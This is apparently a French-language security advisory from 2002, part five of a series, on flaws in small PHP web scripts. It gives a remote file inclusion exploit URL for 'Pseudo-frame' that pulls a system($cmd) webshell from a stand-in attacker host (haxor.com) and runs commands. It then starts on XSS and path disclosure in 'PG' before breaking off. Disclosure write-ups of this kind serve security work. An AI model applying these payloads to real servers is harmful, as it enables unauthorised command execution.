5 holes, Part 5 *************** Intro : ******* Bonne lecture... Date : ****** 12/05/02 Services : ********** - Pseudo-frame - PG - KvPoll - Phorum - BanMat Developpements : **************** 1) Pseudo-frame ~~~~~~~~~~~~~~~ http://www.clicky-web.net Version : 1.0 Problème : - Inclusion de fichiers Developpement : Voici une faille assez impressionante =) Ici le code complet du fichier index.php : ----------------------------------------- ----------------------------------------- On peut donc définir nous même la page à inclure. Pour inclure http://www.haxor.com/file.php : http://www.site.com/index.php?page=http://www.haxor.com/file file.php contenant par exemple system($cmd); ?> Et on executerais avec http://www.site.com/index.php?page=http://www.haxor.com/file&cmd=ls 2) PG ~~~~~ http://www.clicky-web.net Version : 1.0 Problèmes : - XSS - Path disclosure Developpement : On peut lire dans index.php : ------------------------------------------------------------------------------- if ($picture_n) { Picture_Count($base_serverpath."/".$gallery_name, $picture_n); $picturename_withpath = $base_dir."/".$gallery_name."/". $picture_n; echo "